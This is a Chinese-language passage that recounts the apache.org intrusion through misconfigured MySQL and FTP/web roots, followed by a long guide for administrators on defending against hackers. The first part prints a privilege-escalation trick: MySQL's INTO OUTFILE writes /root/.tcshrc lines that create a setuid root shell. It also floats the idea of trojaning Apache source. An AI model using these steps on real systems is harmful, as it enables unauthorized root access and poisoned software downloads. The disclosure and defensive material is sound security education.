经过长时间的搜索,我们发现mysql是以root的权限运行的,并且可以本地运行,因为apache.org还运行了bugzilla需要mysql帐号,并且将其用户名/密码明文存放,所以很轻易的就可以获得mysql数据库的帐号密码。
我们下载了nportredird(从名字就可以知道应该是端口重定向的工具了),并设置成允许我的IP从23306端口接入并且重定向到本地的3306端口――这样我就能使用我的mysql客户端了。
6、完全控制mysql,用它来建立文件
通过3306端口进入后,用bugs的帐号进入――BugZilla默认安装带来的安全问题之一吧……
包括以root身份运行mysqld……。
用'SELECT ... INTO OUTFILE;'的方法,我们可以在任何地方以root的身份建立文件,这些文件将是666权限的,无法覆盖其它文件,但它仍然是有用的,你准备如何利用它呢?无法用.rhosts――任何人可读的.rhosts,rshd是不允许连接运行的,所以rsh无法利用。
7、添加/root/.tcshrc
于是我们决定给他下个套:),于是我们在root的文件夹建立一个文件/root/.tcshrc
cp /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc
就这么简单,现在我们可以等待某人来运行su了,很幸运的――我们没有等太久,就得到了一个suid的shell,成为root后的事情也是同样微不足道的――更改主页并且给主机的管理员发送了Email通知了存在的漏洞。
9、修补ftproot==wwwroot的漏洞
进入系统后我们做的另一件是建立ftproot,将dist移至ftproot/dist并且将ftproot指向这个目录,将可写的目录更改成入侵者无法利用的,保持FTP服务不变……
10、我们可以做什么?
还记得去年发生在ftp.win.tue.nl的事吗?有人在tcp_wrappers里放了木马:),如果我们想这么做的话,就可以将木马放在阿帕奇里――编辑源程序并让大家来下载这个有木马后门的版本,很刺激,不是吗:)
11、简要回顾:
发现ftproot==webroot---&可写的目录允许上传php3脚本---&mysqld以root运行,而且缺乏密码保护……这就是配置错误所在了。&
好了……一切顺利:)
诚如作者所言,他们并没有利用什么最新漏洞,而仅仅是通过对webserver和数据库的一些不当配置的利用,得到了系统的最高权限――事情还是发生在apache!呵,听来有些夸张,但国内的情况呢……如果您关注系统安全的话,应该能知道的:(,不知道某些手握大权的系统管理员们会不会多留点心……
系统管理员如何防范黑客的攻击
1.对重要数据和资料完全进行备份,并将备份所用的存储设备单独放置,而不是连在互联网上,这是网站或系统遭到恶意攻击后最好的解救方法。
2.特别重要的网站要做到24小时有网络管理员值班,并采取技术措施循环检查系统日志,以及动态IP的变化。
3.无人值守网站时,关闭一切连在互联网上的供工作人员使用的电脑终端设备,因为绝大多数黑客攻击时往往都是从这些防范薄弱的电脑终端侵入,从中找到网站或系统的弱点,进而取得管理员或用户密码,并夺取网站管理的超级权限,借此转攻网站系统内的其他机器。
4.检查所有用户口令,特别是管理员的超级权限口令,尽量作到使口令中同时含有数字,大小写字母,符号等,因为口令的组合多,解码将是相当困难的,而且口令长度不得小于8位;另外,还要经常去有关的安全站点下载系统补丁程序,尽可能地将系统的漏洞补上。
以下是相关资料摘录,供参考:
一.网站被攻击的几种方式
想成功抵制住黑客的攻击,我们必须从互联网,报刊杂志和有关的技术资料上了解关于黑客的一些详细情况。一份基于网络安全的报告调查称:在互联网上大约有20%的单位曾被黑客侵入;约40%的单位没有安装防火墙(Firewall);不少于30%的黑客入侵事件是在未能正确安装防火墙的情况下发生的。一般来说,黑客入侵网站常用这样的几种方式:
●Data Diddling-------------未经授权删除档案,更改其资料(15.5%)
●Scanner-------------利用工具寻找暗门漏洞(15.8%)
●Sniffer--------------监听加密之封包(11.2%)
●Denial of Service-------------使其系统瘫痪(16.2%)
●IP Spoofing---------------冒充系统内网络的IP地址(12.4%)
●Other------------其他(13.9%)
黑客为什么这么容易进入系统?为什么那些安装了防火墙的系统一样会被黑客入侵呢?最主要的原因有:
●系统本身就存在有许多漏洞(暗门)
●以往黑客多是单枪匹马,但现在由于互联网的普及,使得黑客之间的联络更加方便,从而往往采取&结伙抢劫&的入侵方式.据说美国有一家称作&大屠杀2600(Genocide
2600)&的黑客组织,现拥有150多万成员.他们扎根在美国西北部和阿拉斯加地区,并开始向东海岸地区扩展.他们来自各行各业,年龄从14岁到52岁.
●Internet上有许多现成的黑客工具软件,例如&Rootkit&,&Satan&等,这些程序成为黑客方便好用的工具;
●以错误的方式安装防火墙.
二.防范黑客攻击的措施
1.选用安全的口令
根据十几个黑客软件的工作原理,参照口令破译的难易程度,以破解需要的时间为排序指标,这里列出了常见的采用危险口令的方式:用户名(帐号)作为口令;用户名(帐号)的变换形式作为口令;使用生日作为口令;常用的英文单词作为口令;5位或5位以下的字符作为口令.
因此,我们在设置口令时应该遵循以下原则:
●口令应该包括大小写字母,有控制符更好;
●口令不要太常规;
●应保守口令秘密并经常改变口令.最糟糕的口令是具有明显特征的口令,不要循环使用旧的口令;●至少每九十天把所有的口令改变一次,对于那些具有高安全特权的口令更应该经常地改变.
●应把所有的缺省都从系统中去掉,如果服务器是有某个服务公司建立的,要注意找出类似GUEST,MANAGER,SERVICE等的口令并立即改变这些口令;
●如果接收到两个错误的口令就应断开系统连接
●应及时取消调离或停止工作的雇员的帐号以及无用的帐号;
●在验证过程中,口令不得以明文方式传输;
●口令不得以明文方式存放在系统中,确保口令以加密的形式写在硬盘上并包含口令的文件是只读的;
●用户输入的明口令,在内存逗留的时间尽可能缩短,用后及时销毁;
●一次身份验证只限于当次登录(login),其寿命于会话长度相等;
●除用户输入口令准备登录外,网络中的其他验证过程对用户是透明的.
我们之所以如此强调口令设置的重要性,是因为关于网站安全调查的结果表明;超过80%的安全侵犯都是由于人民选用了拙劣的口令而导致的.这样,我们可以推断,80%的入侵可以通过选择好的口令来阻止.
2.实施存取控制
存取控制规定何种主体对何种具有何种操作权力.存取控制是内部网络安全理论的重要方面,它包括人员权限,数据标识,权限控制,控制类型,风险分析等内容.3.保证数据的完整性
完整性是在数据处理过程中,在原来数据和现行数据之间保持完全一致的证明手段.一般常用数字签名和数据加密算法来保证.
4.确保数据的安全
通过加密算法对数据处理过程进行加密,并采用数字签名及认证来确保数据的安全.
5.使用安全的服务器系统
如今可以选择的服务器系统是很多的:UNIX,WindowsNT,Novell,Intranet等,但是关键服务器最好使用UNIX系统.
6.谨慎开放缺乏安全保障的应用和端口
7.定期分析系统日志
这类分析工具在UNIX中随处可见.NT Server的用户现在可以利用Intrusion
Detection公司的Kane Secu-
rity Analyst(KSA)来进行这项工作.欲了解更多的细节可查看地址为//www.intmsion.com的网站.
8.不断完善服务器系统的安全性能
很多服务器系统都被发现有不少漏洞,服务商会不断在网上发布系统的补丁.为了保证系统的安全性,应随时关注这些信息,及时完善自己的系统.
9.排除人为因素
再完善的安全体制,没有足够的安全意识和技术人员经常维护,安全性将大打折扣.
10.进行动态站点监控
及时发现网络遭受攻击情况并加以防范,避免对网络造成任何损失.
11.攻击自己的站点
测试网络安全的最好方法是自己尝试进攻自己的系统,并且不是做一次,而是定期地做,最好能在入侵者发现安全漏洞之前自己先发现.如果我们从Inernet上下载一个口令攻击程序并利用它,这可能会更有利于我们的口令选择.如果能在入侵者之前自己已经发现不好的或易猜测的口令,这是再好不过的了.
12.请第三方评估机构或专家来完成网络安全的评估
这样做的好处是能对自己所的环境有个更加清醒的认识,把未来可能的风险降到最小.
13.谨慎利用共享软件
许多程序员为了测试和调试的方便,都在他们看起来无害的软件中藏有后门,秘诀和陷阱,发布软件时却忘了去掉他们.对于共享软件和免费软件,一定要彻底地检测他们.如果不这样做,可能会损失惨重.
14.做好数据的备份工作
这是非常关键的一个步骤,有了完整的数据备份,我们在遭到攻击或系统出现故障时才可能迅速恢复我们的系统.
15.主动防御
我们也可以使用自己喜欢的搜索引擎来寻找口令攻击软件和黑客攻击软件,并在自己的网络上利用他们来寻找可能包含系统信息的文件.这样我们也许能够发现某些我们还未察觉到的安全风险.
相关软件的站点推荐如下:
http://www-genome.wi.mit.edu/www/faqs/wwwsecurity-faq.txt
http://www.cerf.net/~paulp/cgi-security
http://theory.lcs.mit.edu/~revest/cryptsecurity.html
ftp://ftp.netcom.com/pub/qwerty
http://www.pay.uq.oz.au/~ftp/crypto
http://www.umr.edu/~cgiwrap
SSL文档:http://home.netscape.com/info/SSL.html
附加文档:http://home.mcom.com/newsref/ref/internet-security.html
库下载:ftp://ftp.psy.uq.oz.au/pub/crypto/ssl
PGP简介:http://web.mit.edu/network/pgpform.html
欧洲版本:ftp://ftp.infomatik.uni-hamburg.de/virus/crpt/pgp/tools
公共密钥加密:http://word.std.com/~franl/crypto/crypto.html
RSA加密专利公司:http://www.rsa.com.faq
16.使用防火墙
防火墙正在成为控制对网络系统访问的非常流行的方法.事实上,在Intrnet上的WEB网站中,超过三分之一的WEB网站都是由某种形式的防火墙加以保护,这是对黑客防范最严,安全性较强的一种方式,任何关键性的服务器,都建议放在防火墙之后.任何对关键服务器的访问都必须通过代理服务器,这虽然降低了服务器的交互能力,但为了安全,这点牺牲是值得的.
但是,防火墙也存在以下局限性:
●防火墙不能防范不经由防火墙的攻击.如果内部网用户与Internet服务提供商建立直接的SLIP或PPP连接,则绕过防火墙系统所提供的安全保护.
●防火墙不能防范认为因素的攻击.
●防火墙不能防止受病毒感染的软件或文件的传输.
●防火墙不能防止数据驱动式的攻击,当有些表面看来无害的数据邮寄或拷贝到内部网的主机上并执行时,可能会发生数据驱动式的攻击.
对此,提出以下几点建议:
⑴对敏感性页面不允许缓存;
⑵不要打开未知者发来的邮件附件;
⑶不要使用微软的安全系统;
⑷不要迷信防火墙.
